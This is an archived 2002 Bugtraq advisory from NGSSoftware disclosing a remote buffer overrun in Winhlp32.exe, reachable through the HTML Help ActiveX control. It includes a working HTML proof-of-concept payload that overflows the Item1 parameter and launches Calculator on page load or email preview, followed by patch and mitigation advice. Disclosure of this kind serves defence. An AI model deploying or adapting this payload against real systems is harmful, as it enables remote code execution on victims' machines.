Winhelp32 Remote Buffer Overrun

From: Next Generation Insight Security Research Team (mark@ngssoftware.com)
Date: 08/02/02


From: "Next Generation Insight Security Research Team" <mark@ngssoftware.com>
To: <bugtraq@securityfocus.com>, <ntbugtraq@listser.ntbugtraq.com>
Date: Thu, 1 Aug 2002 18:59:31 -0700


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

NGSSoftware Insight Security Research Advisory

Name: Winhlp32.exe Remote BufferOverrun
Systems Affected: Win2K Platform
Severity: Critical
Category: Remote Buffer Overrun
Vendor URL: http://www.mircosoft.com
Author: Mark Litchfield (mark@ngssoftware.com)
Date: 1st August 2002
Advisory number: #NISR01082002

Description
***********

Many of the features available in HTML Help are implemented through
the HTML Help ActiveX control (HHCtrl.ocx). The HTML Help ActiveX
control is used to provide navigation features (such as a table of
contents), to display secondary windows and pop-up definitions, and
to provide other features. The HTML Help ActiveX control can be used
from topics in a compiled Help system as well as from HTML pages
displayed in a Web browser. The functionality provided by the HTML
Help ActiveX control will run in the HTML Help Viewer or in any
browser that supports ActiveX technology, such as Internet Explorer
(version 3.01 or later). Some features, as with the WinHlp Command,
provided by the HTML Help ActiveX control are meant to be available
only when it is used from a compiled HTML Help file (.chm) that is
displayed by using the HTML Help Viewer.

Details
*******

Winhlp32.exe is vulnerable to a bufferoverrun attack using the Item
parameter within WinHlp Command, the item parameter is used to
specify the file path of the WinHelp (.hlp) file in which the WinHelp
topic is stored, and the window name of the target window. Using
this overrun, an attacker can successfully exectute arbitary code on
a remote system by either encouraging the victim to visit a
particular web page, whereby code would execute automatically, or by
including the exploit within the source of an email. In regards to
email, execution would automatically occur when the mail appears in
the preview pane and ActiveX objects are allowed (This is allowed by
default, the Internet Security Settings would have to be set as HIGH
to prevent execution of this vulnerability). Any exploit would
execute in the context of the logged on user.

Visual POC Exploit
******************

This POC will simply display Calculator. Please note that this
written on a Win2k PC with SP2 installed. I have not tested it on
anything else.

<OBJECT classid=clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11
codeBase=hhctrl.ocx#Version=4,72,8252,0 height=0 id=winhelp
type=application/x-oleobject width=0><PARAM NAME="Width"
VALUE="26"><PARAM NAME="Height" VALUE="26"><PARAM NAME="Command"
VALUE="WinHelp"><PARAM NAME="Item1"
VALUE="3Phcalc4$&#402;&#1;PVw3P&#8221;wAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKLLLLMMMMNNNNOOOOP
PPPQQQQRRRRSSSSTTTAAAA&#11;wABCDEFGH&#402;&#21;gMyWindow"><PARAM
NAME="Item2" VALUE="NGS Software LTD"></OBJECT>
<SCRIPT>winhelp.HHClick()</SCRIPT>

Fix Information
***************

NGSSoftware alerted Microsoft to these problems on the 6th March
2002. NGSSoftware highly recommend installing Microsoft Windows SP3,
as the fix has been built into this service pack found at
http://www.microsoft.com
An alternative to these patches would be to ensure the security
settings found in the Internet Options is set to high. Despite the
Medium setting, stating that unsigned ActiveX controls will not be
downloaded, Kylie will still execute Calc.exe. Another alternative
would be to remove winhlp32.exe if it is not required within your
environment.
A check for these issues has been added to Typhon II, of which more
information is available from the
NGSSoftware website, http://www.ngssoftware.com.

Further Information
*******************

For further information about the scope and effects of buffer
overflows, please see

http://www.ngssoftware.com/papers/non-stack-bo-windows.pdf
http://www.ngssoftware.com/papers/ntbufferoverflow.html
http://www.ngssoftware.com/papers/bufferoverflowpaper.rtf
http://www.ngssoftware.com/papers/unicodebo.pdf

-----BEGIN PGP SIGNATURE-----
Version: PGPfreeware 7.0.3 for non-commercial use <http://www.pgp.com>

iQA/AwUBPUnnf8a1CFAff8bXEQLz8gCgm4lbs5Fs2WUH5Au2cAkG0JQKKLMAn13p
a+qSkYWrz7uspZcqqRTc2r0C
=2PKN
-----END PGP SIGNATURE-----



Relevant Pages

  • Re: Winhelp32 Remote Buffer Overrun
    ... > the HTML Help ActiveX control. ... > execute in the context of the logged on user. ...
    (Bugtraq)
  • Re: Winhelp32 Remote Buffer Overrun
    ... > notified microsoft of this several months ago. ... >> the HTML Help ActiveX control. ...
    (Bugtraq)
  • Winhlp32.exe Remote BufferOverrun
    ... Many of the features available in HTML Help are implemented through the HTML ... Help ActiveX control. ... Any exploit would execute ...
    (NT-Bugtraq)
  • New Winhlp32.exe vuln
    ... Can this vulnerability be exploited using the HTML help ActiveX control? ... i get an error "This operation is allowed only within HTML help"? ...
    (Bugtraq)
  • RE: Winhelp32 Remote Buffer Overrun
    ... > Subject: Re: Winhelp32 Remote Buffer Overrun ... The HTML Help ActiveX control ... >>> Help ActiveX control will run in the HTML Help Viewer or in any ... >>> execute in the context of the logged on user. ...
    (Bugtraq)